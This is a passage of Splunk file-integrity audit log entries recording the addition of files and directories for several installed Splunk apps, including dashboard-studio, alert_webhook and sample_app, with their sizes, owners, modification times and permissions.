action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-emergency-department-care-dashboard.xml", isdir=0, size=160, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.367, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-ecommerce-monitoring-dashboard.xml", isdir=0, size=153, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.363, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-dropdown-input.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.360, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-datacenter-dashboard.xml", isdir=0, size=150, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.355, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-data-streaming-dashboard.xml", isdir=0, size=146, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.350, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-data-command-dashboard.xml", isdir=0, size=156, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.344, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-customer-satisfaction-dashboard.xml", isdir=0, size=153, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.340, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-custom-url-drilldown.xml", isdir=0, size=155, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-column-chart-visualization.xml", isdir=0, size=138, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.331, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-choropleth-svg-visualization.xml", isdir=0, size=146, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.326, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-cascading-inputs.xml", isdir=0, size=148, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.323, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-buttercup-games-dashboard.xml", isdir=0, size=147, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.318, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-bubble-chart-visualization.xml", isdir=0, size=138, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.313, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-base-chain-data.xml", isdir=0, size=159, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.309, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-bar-chart-visualization.xml", isdir=0, size=135, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.305, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-assembly-line-dashboard.xml", isdir=0, size=145, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.301, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-area-chart-visualization.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-airport-kpis-dashboard.xml", isdir=0, size=144, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.293, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-ad-hoc-data.xml", isdir=0, size=150, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.289, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/dashboard.xml", isdir=0, size=129, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.780, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.769, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.765, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/inputs.conf", isdir=0, size=184, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.761, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.756, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/collections.conf", isdir=0, size=52, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.752, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/app.conf", isdir=0, size=196, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.749, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/metadata/default.meta", isdir=0, size=382, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.744, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/bin/__pycache__/utils.cpython-37.pyc", isdir=0, size=490, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:57.740, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/bin/utils.py", isdir=0, size=260, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.737, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/bin/save_image_and_icon_on_install.py", isdir=0, size=8817, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.734, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/bin/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:57.630, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/static/appIcon_2x.png", isdir=0, size=2200, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.626, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/static/appIconAlt_2x.png", isdir=0, size=2200, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.622, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/static/appIconAlt.png", isdir=0, size=1098, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.619, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/static/appIcon.png", isdir=0, size=1098, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.615, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_CN/LC_MESSAGES/messages.po", isdir=0, size=185562, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.611, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_CN/LC_MESSAGES/messages.mo", isdir=0, size=51799, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_CN/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.603, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ja_JP/LC_MESSAGES/messages.po", isdir=0, size=195899, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.599, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ja_JP/LC_MESSAGES/messages.mo", isdir=0, size=62241, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.596, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ja_JP/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.491, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/fr_FR/LC_MESSAGES/messages.po", isdir=0, size=192816, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.487, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/fr_FR/LC_MESSAGES/messages.mo", isdir=0, size=59774, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/fr_FR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ko_KR/LC_MESSAGES/messages.po", isdir=0, size=191707, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ko_KR/LC_MESSAGES/messages.mo", isdir=0, size=58037, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.470, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ko_KR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.465, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/de_DE/LC_MESSAGES/messages.po", isdir=0, size=190812, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/de_DE/LC_MESSAGES/messages.mo", isdir=0, size=57519, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/de_DE/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.451, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_TW/LC_MESSAGES/messages.po", isdir=0, size=186226, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.446, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_TW/LC_MESSAGES/messages.mo", isdir=0, size=52466, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_TW/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.338, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/it_IT/LC_MESSAGES/messages.po", isdir=0, size=190363, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.333, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/it_IT/LC_MESSAGES/messages.mo", isdir=0, size=57170, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.329, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/it_IT/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.325, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_TW", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.321, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/zh_CN", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.316, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/messages.pot", isdir=0, size=169535, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ko_KR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.308, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/ja_JP", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.305, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/it_IT", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.300, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/fr_FR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale/de_DE", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.192, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.188, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.185, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/locale", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.181, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/kvstore_icon_status.conf", isdir=0, size=35, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:21 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:57.177, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.173, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.170, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.164, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/app.manifest", isdir=0, size=1385, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.158, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/appserver/static/webhook.png", isdir=0, size=2410, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.152, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.047, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default/data/ui/alerts/webhook.html", isdir=0, size=941, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.042, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default/data/ui/alerts", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.036, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.032, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default/restmap.conf", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.029, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:57.024, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default/app.conf", isdir=0, size=226, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.020, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default/alert_actions.conf", isdir=0, size=203, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.016, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/metadata/default.meta", isdir=0, size=169, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.013, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/README/savedsearches.conf.spec", isdir=0, size=198, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.008, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/README/alert_actions.conf.spec", isdir=0, size=113, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:57.003, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/bin/webhook.py", isdir=0, size=2217, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.899, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.895, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.891, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.887, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.882, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.878, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_httpinput/default/inputs.conf", isdir=0, size=247, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.874, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_httpinput/metadata/local.meta", isdir=0, size=221, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:38 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:56.870, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_httpinput/local/inputs.conf", isdir=0, size=105, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:38 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:56.866, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_httpinput/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:38 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:42:56.862, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_httpinput/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:38 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:42:56.858, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_httpinput/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.754, user=n/a, action=add,path="/opt/splunk/etc/apps/legacy/default/props.conf", isdir=0, size=1866, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.750, user=n/a, action=add,path="/opt/splunk/etc/apps/legacy/default/app.conf", isdir=0, size=27, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.746, user=n/a, action=add,path="/opt/splunk/etc/apps/legacy/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.741, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/appserver/static/application.css", isdir=0, size=1698, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.736, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.731, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/default/props.conf", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.726, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/default/inputs.conf", isdir=0, size=138, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.722, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/default/indexes.conf", isdir=0, size=182, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.719, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/default/app.conf", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.712, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/metadata/default.meta", isdir=0, size=219, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.708, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/logs/maillog.1", isdir=0, size=5601514, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.703, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/logs/maillog", isdir=0, size=2685248, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:56.599, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.594, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/logs", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:56.590, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 